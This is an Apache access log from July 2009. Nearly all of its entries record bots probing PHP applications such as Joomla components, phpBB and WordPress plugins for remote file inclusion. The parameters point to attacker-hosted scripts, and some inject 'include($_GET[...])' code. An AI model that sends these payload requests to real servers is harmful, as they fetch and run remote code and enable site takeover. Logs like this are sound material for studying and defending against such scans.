217.125.38.117 - - [06/Jul/2009:05:11:38 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:11:42 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:11:42 -0400] "GET /?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:11 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:27 -0400] "GET /?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:27 -0400] "GET /logs/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:27 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:34 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:36 -0400] "GET /?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:36 -0400] "GET /logs/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:37 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:12:43 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:12:56 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:12:56 -0400] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:12:56 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:05 -0400] "GET /?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:05 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:05 -0400] "GET /logs/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:13:07 -0400] "GET /logs/access_log.Q109052200//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:10 -0400] "GET /?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:10 -0400] "GET /logs/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:10 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:11 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:13:16 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:21 -0400] "GET /logs/access_log.Q109062000%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:22 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:23 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:26 -0400] "GET /logs/access_log.Q109062000%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:46 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:51 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:53 -0400] "GET /logs/access_log.Q109052400%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:13:58 -0400] "GET /logs/access_log.Q109052400%20%20/omponents/com_simpleboard/image_upload.php?sbp=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:14:10 -0400] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:14:10 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:14:10 -0400] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:14:15 -0400] "GET /logs/error_log.Q109052400%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:05:14:30 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://extranet.teligentems.com/gefel.txt? HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
66.197.183.21 - - [06/Jul/2009:05:14:30 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://extranet.teligentems.com/gefel.txt? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
66.197.183.21 - - [06/Jul/2009:05:14:30 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://extranet.teligentems.com/gefel.txt? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
61.78.62.84 - - [06/Jul/2009:05:14:31 -0400] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:14:32 -0400] "GET /logs/access_log.Q109051700/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:14:32 -0400] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:14:34 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:14:34 -0400] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:14:35 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:14:42 -0400] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:14:42 -0400] "GET /logs/access_log.Q109051700/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:14:45 -0400] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:14:49 -0400] "GET /logs/access_log.Q109052200//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.197.183.21 - - [06/Jul/2009:05:14:57 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://extranet.teligentems.com/gefel.txt? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.253.80.190 - - [06/Jul/2009:05:15:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
72.253.80.190 - - [06/Jul/2009:05:15:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
61.78.62.84 - - [06/Jul/2009:05:15:08 -0400] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:15:08 -0400] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:15:12 -0400] "GET /logs/access_log.Q109051700%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:15:30 -0400] "GET /logs/access_log.Q109052400//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:05:15:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [06/Jul/2009:05:15:48 -0400] "GET /logs/error_log.Q109052400//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.253.80.190 - - [06/Jul/2009:05:15:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
195.34.78.110 - - [06/Jul/2009:05:15:56 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:15:56 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:15:56 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:07 -0400] "GET /?_phplib%5Blibdir%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:09 -0400] "GET /logs/access_log.Q109050700/?_phplib%5Blibdir%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:09 -0400] "GET /logs/?_phplib%5Blibdir%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:16 -0400] "GET /logs/access_log.Q109061300/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:22 -0400] "GET /logs/?_phplib%5Blibdir%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:23 -0400] "GET /?_phplib%5Blibdir%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:23 -0400] "GET /logs/access_log.Q109062200%20%20/?_phplib%5Blibdir%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:16:24 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:05:16:28 -0400] "GET /logs/access_log.Q109061800//agendax/addevent.inc.php?agendax_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:05:16:28 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:05:16:28 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:05:16:30 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:05:16:32 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:16:34 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:16:37 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:16:37 -0400] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:16:37 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:16:41 -0400] "GET /logs/access_log.Q109050700%20%20/?_phplib%5Blibdir%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:16:52 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:17:01 -0400] "GET /logs/access_log.Q109061300%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:17:09 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:05:17:12 -0400] "GET /logs/access_log.Q109051100/forum.php?act=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:05:17:12 -0400] "GET /forum.php?act=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:05:17:12 -0400] "GET /logs/forum.php?act=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:17:12 -0400] "GET /logs/access_log.Q109052200//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:05:17:27 -0400] "GET /logs/access_log.Q109060500/forum.php?act=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:05:17:48 -0400] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:05:17:50 -0400] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:05:17:50 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:05:17:51 -0400] "GET /logs/access_log.Q109051100%20%20/forum.php?act=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:05:17:51 -0400] "GET /logs/access_log.Q109060500%20%20/forum.php?act=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:05:18:05 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:05:18:43 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:05:18:43 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:05:18:43 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:05:18:45 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
211.230.156.161 - - [06/Jul/2009:05:19:45 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 233 "-" "Mozilla/4.61 [en] (OS/2; U)"
211.230.156.161 - - [06/Jul/2009:05:19:45 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 238 "-" "Mozilla/4.61 [en] (OS/2; U)"
121.124.127.34 - - [06/Jul/2009:05:20:18 -0400] "GET //atom.php5?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:05:20:18 -0400] "GET /logs//atom.php5?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:05:20:24 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:05:20:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.230.156.161 - - [06/Jul/2009:05:20:37 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/test.txt? HTTP/1.1" 200 454 "-" "Mozilla/4.61 [en] (OS/2; U)"
211.230.156.161 - - [06/Jul/2009:05:20:37 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/test.txt? HTTP/1.1" 200 8393 "-" "Mozilla/4.61 [en] (OS/2; U)"
116.80.249.148 - - [06/Jul/2009:05:20:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YTB720; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zango 10.3.75.0)"
116.80.249.148 - - [06/Jul/2009:05:20:53 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YTB720; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zango 10.3.75.0)"
116.80.249.148 - - [06/Jul/2009:05:20:58 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YTB720; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zango 10.3.75.0)"
116.80.249.148 - - [06/Jul/2009:05:20:58 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YTB720; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zango 10.3.75.0)"
218.158.98.196 - - [06/Jul/2009:05:20:59 -0400] "GET /logs/access_log.Q109052500%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:21:08 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:05:21:13 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:05:21:13 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:05:21:13 -0400] "GET /logs/access_log.Q109062500//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:21:17 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:21:19 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:05:21:21 -0400] "GET /logs/access_log.Q109062400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:21:26 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:21:41 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:21:45 -0400] "GET /logs/access_log.Q109052200%20%20//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:05:22:18 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:22:20 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
